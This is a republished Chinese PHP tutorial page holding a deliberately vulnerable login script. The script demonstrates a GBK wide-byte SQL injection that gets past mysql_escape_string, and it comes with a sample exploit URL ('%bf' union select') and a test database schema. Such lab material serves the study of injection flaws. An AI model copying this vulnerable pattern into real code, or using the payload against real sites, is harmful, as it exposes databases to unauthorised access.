来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] ?php02 /*03 * code:c4bbage04 * From:cunlide.com05 */06 error_reporting(E_ALL);07 $conn = mysql_connect(localhost,root,toor);08 mysql_query(SET NAMES #39;GBK#39;);09 ......
|
<?php
02 /*
03 * code:c4bbage
04 * From:cunlide.com
05 */
06 error_reporting(E_ALL);
07 $conn = mysql_connect("localhost","root","toor");
08 mysql_query("SET NAMES 'GBK'");
09 mysql_select_db("test1",$conn);
10 $username=mysql_escape_string($_GET['username']);
11 //$username= addslashes($_GET['username']);
12 var_dump($username);
13 $password=mysql_escape_string($_GET['password']);
14 $sql= "select * from admin where username='$username' and password='$password'";
15 print_r($sql);echo "<br>";
16 $result = mysql_query($sql,$conn);
17 print_r($result);echo "<br>";
18 while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
19 {
20 print_r($row[]=$row);
21 }
www.2cto.com
22 /*
23 exp:
24 http://127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password
25 db file :
26 --test1.sql
27 SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
28 SET time_zone = "+00:00";
29 --gbk database
30 CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;
31 USE `test1`;
32
33 CREATE TABLE IF NOT EXISTS `admin` (
34 `id` int(11) NOT NULL,
35 `username` varchar(15) NOT NULL,
36 `password` varchar(15) NOT NULL,
37 PRIMARY KEY (`id`)
38 ) ENGINE=InnoDB DEFAULT CHARSET=gbk;
39
40 INSERT INTO `admin` (`id`, `username`, `password`) VALUES
41 (1, 'admin', 'password');
42
43 */
44 ?>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
